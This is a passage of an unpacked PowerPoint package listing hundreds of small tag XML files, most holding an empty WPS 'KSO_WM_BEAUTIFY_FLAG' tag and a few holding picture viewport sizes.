</file>

<file path=ppt/tags/tag69.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag690.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag691.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag692.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag693.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag694.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag695.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag696.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag697.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag698.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag699.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag70.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag700.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag701.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag702.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag703.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag704.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag705.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag706.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag707.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag708.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag709.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag71.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag710.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag711.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag712.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag713.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag714.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag715.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag716.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag717.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag718.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag719.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag72.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag720.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag721.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag722.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag723.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag724.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag725.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag726.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag727.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag728.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag729.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag73.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag730.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag731.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag732.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag733.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag734.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag735.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag736.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag737.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag738.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag739.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag74.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag740.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag741.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag742.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag743.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag744.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag745.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag746.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag747.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag748.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag749.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag75.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag750.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag751.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag752.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag753.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag754.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag755.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag756.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag757.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag758.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag759.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag76.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag760.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag761.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag762.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag763.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag764.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag765.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag766.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag767.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag768.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag769.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag77.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag770.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag771.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag772.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag773.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag774.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag775.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag776.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag777.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag778.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag779.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag78.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag780.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag781.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag782.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag783.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag784.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag785.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag786.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag787.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag788.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag789.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag79.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag790.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag791.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag792.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag793.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag794.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
